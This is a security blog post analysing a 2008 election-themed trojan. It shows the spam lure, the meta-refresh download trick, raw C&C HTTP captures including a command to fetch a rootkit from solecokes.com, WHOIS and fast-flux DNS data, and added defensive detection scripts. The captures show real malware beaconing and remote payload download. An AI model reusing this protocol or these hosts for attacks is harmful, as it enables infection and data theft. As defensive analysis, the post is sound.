Quick Analysis of the Obama Trojan
Yesterday, the 5th of November, we started receiving spam that advertised Obama Election videos. These emails are rather plain and only contain simple text and a link.
Email Contents:
Barack Obama Elected 44th President of United States
Barack Obama, unknown to most Americans just four years ago, will become the 44th president and
the first African-American president of the United States.
Watch His amazing speech at November 5!
A link to http://{removed} with the link text "Proceed to the election results news page"
2008 American Government Official Website
This site delivers information about current U.S. Foreign policy and about American life and culture.
The URL domains are randomly generated and hosted on compromised machines ("slaves") within the botnet. As of today these URLs either no longer resolve or host blank pages. We also noted that the two domains were registered on November 4th and originated in China, a day before we started receiving the spam messages.
verifyonenet.exacttrget.sessionervlet.1otmvxgjb.securitychallenge.communitypage.rn1mnqinq.bfiinwach.com - Domain no longer resolvable
carehtmlclient.viewcontent.productsremote.3xnhnoe9x.customerlogin.verification.wqvnskxwk.gerimumsoe.com - Domain no longer resolvable
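The two hostnames above share a shape that is easy to score mechanically: far more labels than a legitimate site uses, and labels that mix letters and digits in a random-looking way. The following is an added example (not code from the original post) that computes those features and flags a hostname against simple thresholds; the thresholds and the benign www.example.com comparison host are my own assumptions, and the two spam hostnames are taken from the post.

```python
import math
from collections import Counter

# The two hostnames quoted in the post, plus a constructed benign host for contrast.
SPAM_HOSTS = [
    "verifyonenet.exacttrget.sessionervlet.1otmvxgjb.securitychallenge.communitypage.rn1mnqinq.bfiinwach.com",
    "carehtmlclient.viewcontent.productsremote.3xnhnoe9x.customerlogin.verification.wqvnskxwk.gerimumsoe.com",
]
BENIGN_HOST = "www.example.com"


def shannon_entropy(text):
    """Bits per character of the label text; random-looking strings score high."""
    counts = Counter(text)
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def label_features(host):
    """Structural features of a hostname that separate generated names from real ones."""
    labels = host.lower().rstrip(".").split(".")
    # Labels such as "1otmvxgjb" that interleave digits and letters are rare in real brands.
    mixed = [lab for lab in labels
             if any(ch.isdigit() for ch in lab) and any(ch.isalpha() for ch in lab)]
    return {
        "labels": len(labels),
        "length": len(host),
        "mixed_alnum_labels": len(mixed),
        "longest_label": max(len(lab) for lab in labels),
        "entropy": round(shannon_entropy("".join(labels)), 2),
    }


def is_suspicious_hostname(host, max_labels=6, max_len=80, max_mixed=1):
    """Assumed thresholds: more than 6 labels, longer than 80 chars, or more
    than one mixed alphanumeric label is treated as suspicious."""
    f = label_features(host)
    return (f["labels"] > max_labels
            or f["length"] > max_len
            or f["mixed_alnum_labels"] > max_mixed)


if __name__ == "__main__":
    for host in SPAM_HOSTS + [BENIGN_HOST]:
        print(is_suspicious_hostname(host), label_features(host), host)
```

Both spam hostnames trip the label-count rule on their own (nine labels each), so a proxy or mail gateway could quarantine the message without knowing anything about the domain's content.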
When the user visits the site, it prompts the user to download and install adobe_flash9.exe every 11 seconds. This download prompt is accomplished through the Refresh meta tag, not JavaScript.
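Because the repeating prompt comes from a Refresh meta tag rather than script, a content filter can catch it with a plain HTML scan. Here is an added example (not code from the original post) that parses Refresh meta tags, resolves their target against the page URL and flags any that point at an executable. The sample page, the base URL and the extension list are constructed for the example.

```python
import html
import re
from urllib.parse import urljoin, urlparse

# Constructed sample page (not the real landing page) modelled on the behaviour
# described in the post: a Refresh meta tag that re-issues the executable
# download every 11 seconds without any JavaScript.
SAMPLE_HTML = """<html><head>
<title>Election results</title>
<meta http-equiv="Refresh" content="11; URL=adobe_flash9.exe">
</head><body>Loading the video, please wait...</body></html>"""

# Constructed benign page: a plain self-refresh with no URL part.
BENIGN_HTML = '<html><head><meta http-equiv="refresh" content="300"></head></html>'

META_REFRESH_RE = re.compile(
    r'<meta\s+[^>]*http-equiv\s*=\s*["\']?refresh["\']?[^>]*>', re.IGNORECASE)
CONTENT_RE = re.compile(r'content\s*=\s*["\']([^"\']*)["\']', re.IGNORECASE)
# Assumed list of extensions worth flagging.
EXECUTABLE_EXT = (".exe", ".scr", ".com", ".pif", ".bat", ".msi")


def parse_meta_refresh(page_html, base_url):
    """Return a list of (delay_seconds, absolute_url) for every Refresh meta tag.

    A refresh without a URL part reloads the current page, so its target is base_url.
    """
    results = []
    for tag in META_REFRESH_RE.findall(page_html):
        m = CONTENT_RE.search(tag)
        if not m:
            continue
        # content is "<seconds>" or "<seconds>; URL=<target>" (the URL= prefix is optional)
        parts = html.unescape(m.group(1)).split(";", 1)
        try:
            delay = int(parts[0].strip())
        except ValueError:
            continue
        target = ""
        if len(parts) == 2:
            target = parts[1].strip()
            if target.lower().startswith("url="):
                target = target[4:].strip().strip("'\"")
        results.append((delay, urljoin(base_url, target)))
    return results


def flag_executable_refresh(page_html, base_url):
    """Flag refreshes whose target path ends in an executable extension."""
    hits = []
    for delay, url in parse_meta_refresh(page_html, base_url):
        if urlparse(url).path.lower().endswith(EXECUTABLE_EXT):
            hits.append({"delay": delay, "url": url})
    return hits


if __name__ == "__main__":
    print(flag_executable_refresh(SAMPLE_HTML, "http://landing.example.invalid/news/"))
```

The check works on the raw response body, so it can run in a proxy before any browser renders the page; a short delay combined with an executable target is the signature to alert on.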
Once the download is complete, Windows prompts the user to run the executable. When run, the executable deletes adobe_flash6.exe and creates a running process named 9129837.exe located in C:\Windows. The name of this new program was constant across all the different test machines we ran it on, as well as on the live machines of people who executed it.
In our case, 9129837.exe tried to inject code into the running user process Explorer.exe. This is standard behavior that lets the malware hide from Task Manager. On XP the Security Center was disabled, the firewall was turned off, and we were unable to bring up Task Manager. 9129837.exe also connected to what appears to be a command and control site for instructions and to upload key information. One of the first instructions was to download part of a rootkit, del.exe, from a separate domain.
Here are the HTTP communications between the infected machine and the C&C server. The order of the requests was not the same on each host; only the request to pstore.cgi was always first.
Server: 91.203.93.57

% This is the RIPE Whois query server #2.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html
% Note: This output has been filtered.
% To receive output for a database update, use the "-B" flag

% Information related to '91.203.93.1 - 91.203.93.128'

inetnum:        91.203.93.1 - 91.203.93.128
netname:        ZHITOMIR-NET
descr:          pool for co-location customers
country:        UA
admin-c:        ML7676-RIPE
tech-c:         ML7676-RIPE
status:         ASSIGNED PI
mnt-by:         UATELECOM-MNT
source:         RIPE # Filtered

person:         Mark Liberman
address:        Kiev, Ukraine
e-mail:         m.liberman@uatelecom.com.ua
phone:          +380963801326
nic-hdl:        ML7676-RIPE
source:         RIPE # Filtered

% Information related to '91.203.92.0/22AS44997'

route:          91.203.92.0/22
descr:          BTG-AS
origin:         AS44997
mnt-by:         UATELECOM-MNT
remarks:        responsible: abuse@uatelecom.com.ua
source:         RIPE # Filtered
Request and Response 1
POST /cgi-bin/pstore.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------13c89313c89313c893
User-Agent: IE
Host: 91.203.93.57
Content-Length: 229
Cache-Control: no-cache

----------------------------13c89313c89313c893
Content-Disposition: form-data; name="upload_file"; filename="160856006.5"
Content-Type: application/octet-stream

Forms:
----------------------------13c89313c89313c893--

HTTP/1.1 200 OK
Connection: close
Content-type: text/html
Content-Length: 3
Date: Wed, 05 Nov 2008 18:38:31 GMT
Server: lighttpd/1.4.20

ok!
Request and Response 2
GET /cgi-bin/options.cgi?user_id=160856006&version_id=5&p... HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 91.203.93.57
Connection: Keep-Alive

HTTP/1.1 200 OK
Connection: close
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-type: octet/stream
Content-Length: 14
Date: Wed, 05 Nov 2008 18:38:32 GMT
Server: lighttpd/1.4.20

(...........e0
Request and Response 3
GET /cgi-bin/cmd.cgi?user_id=160856006&version_id=5&p... HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 91.203.93.57
Connection: Keep-Alive

HTTP/1.1 200 OK
Connection: close
Pragma: no-cache
Last-Modified: Wed, 5 Nov 2008 18:38:31 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-type: text/plain
Content-Length: 35
Date: Wed, 05 Nov 2008 18:38:31 GMT
Server: lighttpd/1.4.20

DL_EXE=http://solecokes.com/del.exe
Request and Response 4
POST /cgi-bin/cert.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------13cc7b13cc7b13cc7b
User-Agent: IE
Host: 91.203.93.57
Content-Length: 303
Cache-Control: no-cache

----------------------------13cc7b13cc7b13cc7b
Content-Disposition: form-data; name="upload_file"; filename="160856006.5"
Content-Type: application/octet-stream

0S...0...*.H.. .......0.0;0.0...+........5......&u8.I.>../z...w..=C..C.>l."..`p......
----------------------------13cc7b13cc7b13cc7b--

HTTP/1.1 200 OK
Connection: close
Content-type: text/html
Content-Length: 3
Date: Wed, 05 Nov 2008 18:38:32 GMT
Server: lighttpd/1.4.20

ok!
The target machine now contacts solecokes.com, as directed by the DL_EXE response, to download part of the rootkit.
GET /del.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: solecokes.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Wed, 05 Nov 2008 18:38:25 GMT
Server: Apache
Last-Modified: Mon, 03 Nov 2008 21:06:19 GMT
ETag: "400099-6000-518148c0"
Accept-Ranges: bytes
Content-Length: 24576
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
{Binary data removed}
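The captures above give a network defender several stable features to match on: the bare "IE" User-Agent on the uploads, the four cgi-bin script names, the user_id/version_id beacon parameters, an upload filename built from the bot id and version, and a KEY=value response body that carries the next download URL. The following is an added example (not code from the original post) that parses raw HTTP requests and scores them against those features, and extracts DL_EXE-style directives from a response body so the follow-on URL can be blocklisted. The sample requests are constructed from the captures in the post with bodies trimmed; the scoring rules and the benign comparison request are my own assumptions.

```python
import re
from urllib.parse import parse_qs, urlparse

# Constructed samples reconstructed from the captures in the post (CRLF line
# endings, bodies trimmed to the parts that matter for detection).
REQ_PSTORE = (
    "POST /cgi-bin/pstore.cgi HTTP/1.1\r\n"
    "Content-Type: multipart/form-data; boundary=--------------------------13c89313c89313c893\r\n"
    "User-Agent: IE\r\n"
    "Host: 91.203.93.57\r\n"
    "Content-Length: 229\r\n"
    "Cache-Control: no-cache\r\n"
    "\r\n"
    "----------------------------13c89313c89313c893\r\n"
    'Content-Disposition: form-data; name="upload_file"; filename="160856006.5"\r\n'
    "Content-Type: application/octet-stream\r\n"
    "\r\n"
    "Forms:\r\n"
    "----------------------------13c89313c89313c893--\r\n"
)
REQ_CMD = (
    "GET /cgi-bin/cmd.cgi?user_id=160856006&version_id=5 HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"
    "Host: 91.203.93.57\r\n"
    "Connection: Keep-Alive\r\n"
    "\r\n"
)
# Constructed benign request for contrast.
REQ_BENIGN = (
    "GET /index.html HTTP/1.1\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"
    "Host: www.example.invalid\r\n"
    "\r\n"
)
RESP_CMD_BODY = "DL_EXE=http://solecokes.com/del.exe"

CC_SCRIPT_RE = re.compile(r"^/cgi-bin/(pstore|options|cmd|cert)\.cgi$")
BOT_ID_FILENAME_RE = re.compile(r'filename="(\d+\.\d+)"')


def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, path, query dict, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    parsed = urlparse(target)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": parsed.path,
            "query": parse_qs(parsed.query), "headers": headers, "body": body}


def score_request(req):
    """Return the reasons a request resembles the beaconing captured in the post."""
    reasons = []
    if req["headers"].get("user-agent") == "IE":
        reasons.append("bare 'IE' User-Agent (not a browser string)")
    if CC_SCRIPT_RE.match(req["path"]):
        reasons.append("C&C script name %s" % req["path"])
    if {"user_id", "version_id"} <= set(req["query"]):
        reasons.append("bot id/version beacon parameters")
    m = BOT_ID_FILENAME_RE.search(req["body"])
    if m and "multipart/form-data" in req["headers"].get("content-type", ""):
        reasons.append("multipart upload named after bot id.version (%s)" % m.group(1))
    return reasons


def extract_directives(body):
    """Parse KEY=value lines such as DL_EXE=<url> from a C&C response body."""
    directives = {}
    for line in body.splitlines():
        key, sep, value = line.partition("=")
        if sep and key.strip().isupper():
            directives[key.strip()] = value.strip()
    return directives


if __name__ == "__main__":
    for raw in (REQ_PSTORE, REQ_CMD, REQ_BENIGN):
        print(score_request(parse_request(raw)))
    print(extract_directives(RESP_CMD_BODY))
```

Any single reason is weak on its own (plenty of legitimate sites have a cmd.cgi), so in practice the output is used as a score: two or more reasons on one host, or one reason plus a DL_EXE directive in the response, is what should raise an alert.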
As of this morning at 06:00, solecokes.com resolves to several different IP addresses:
Non-authoritative answer:
Name:    solecokes.com
Address: 190.95.28.108
Name:    solecokes.com
Address: 221.213.78.6
Name:    solecokes.com
Address: 81.247.61.210
Name:    solecokes.com
Address: 82.83.199.100
Name:    solecokes.com
Address: 121.113.166.191
Yesterday, 11/5, at 12:42 the same domain resolved to:
Non-authoritative answer:
Name:    solecokes.com
Address: 89.102.187.216
Name:    solecokes.com
Address: 90.183.68.7
Name:    solecokes.com
Address: 81.242.197.189
Name:    solecokes.com
Address: 87.207.9.23
It is pretty obvious that the solecokes.com domain is part of a dynamic DNS scheme. I would not doubt that these IPs resolve to bot hosts.
A reverse DNS lookup on 87.207.9.23 reveals:
Non-authoritative answer:
23.9.207.87.in-addr.arpa    name = chello087207009023.chello.pl.
and a reverse DNS lookup on 81.242.197.189 pretty much seals the deal that these are just bots hosting temporary malware sites.
Non-authoritative answer:
189.197.242.81.in-addr.arpa    name = 189.197-242-81.adsl-dyn.isp.belgacom.be.
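The two lookups above show the pattern that makes this scheme detectable from DNS alone: the A-record set turns over completely between queries, the addresses are spread across unrelated networks, and the reverse names point at consumer access pools. Here is an added example (not code from the original post) that turns those observations into a heuristic over successive resolution snapshots. The two snapshots and the two PTR records are the ones quoted in the post; the /16 grouping stands in for per-ISP grouping because the example runs offline without ASN data, and the thresholds and the list of residential markers are my own assumptions.

```python
import ipaddress

# Constructed snapshots taken from the two nslookup runs quoted in the post
# (11/5 at 12:42 and the following morning at 06:00).
SNAPSHOT_1105 = ["89.102.187.216", "90.183.68.7", "81.242.197.189", "87.207.9.23"]
SNAPSHOT_1106 = ["190.95.28.108", "221.213.78.6", "81.247.61.210",
                 "82.83.199.100", "121.113.166.191"]

# The PTR records quoted in the post, keyed by address (constructed dict).
PTR_RECORDS = {
    "87.207.9.23": "chello087207009023.chello.pl.",
    "81.242.197.189": "189.197-242-81.adsl-dyn.isp.belgacom.be.",
}

# Assumed substrings that commonly appear in reverse names of consumer access pools.
RESIDENTIAL_MARKERS = ("adsl", "dsl", "dyn", "dial", "cable", "pool",
                       "ppp", "dhcp", "chello")


def prefix16(ip):
    """The /16 containing ip: a crude stand-in for 'same provider' without ASN data."""
    return str(ipaddress.ip_network(ip + "/16", strict=False))


def flux_summary(snapshots):
    """Summarise how an A-record set changes across successive lookups."""
    all_ips = set().union(*map(set, snapshots))
    overlaps = [len(set(a) & set(b)) for a, b in zip(snapshots, snapshots[1:])]
    return {
        "distinct_ips": len(all_ips),
        "distinct_16s": len({prefix16(ip) for ip in all_ips}),
        "consecutive_overlap": overlaps,
    }


def is_fast_flux(snapshots, min_ips=5, min_nets=4, max_overlap=1):
    """Heuristic: many addresses, spread over many networks, with little carry-over
    between lookups. A CDN also returns many addresses, but they cluster in a few
    provider networks, which the distinct_16s requirement is meant to separate."""
    s = flux_summary(snapshots)
    return (s["distinct_ips"] >= min_ips
            and s["distinct_16s"] >= min_nets
            and all(o <= max_overlap for o in s["consecutive_overlap"]))


def looks_residential(ptr_name):
    """True if a reverse name carries consumer-access-pool markers."""
    name = ptr_name.lower()
    return any(marker in name for marker in RESIDENTIAL_MARKERS)


def residential_fraction(ips, ptr_records):
    """Share of addresses with a known PTR that looks residential."""
    known = [ip for ip in ips if ip in ptr_records]
    if not known:
        return 0.0
    return sum(looks_residential(ptr_records[ip]) for ip in known) / len(known)


if __name__ == "__main__":
    snaps = [SNAPSHOT_1105, SNAPSHOT_1106]
    print(flux_summary(snaps), is_fast_flux(snaps))
    print(residential_fraction(SNAPSHOT_1105, PTR_RECORDS))
```

Against the post's data the two snapshots share no address, the nine addresses fall in nine different /16s, and both PTR records carry residential markers, so the domain scores as flux on every axis. The same function run on a stable site returns False because the snapshots overlap completely.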
A little digging around the root of this site turns up a Wachovia error page. As it turns out, this site was previously used as a malicious site to trick Wachovia users during the buyout by Wells Fargo. The botnet admins saw the opportunity presented by the election of Mr. Obama and quickly retooled the site to take advantage of it. This highlights how fast malware site and botnet operators can change gears to make use of opportunities as they present themselves.
One Response to “Quick Analysis of the Obama Trojan”
Nice post u have here
Added to my RSS reader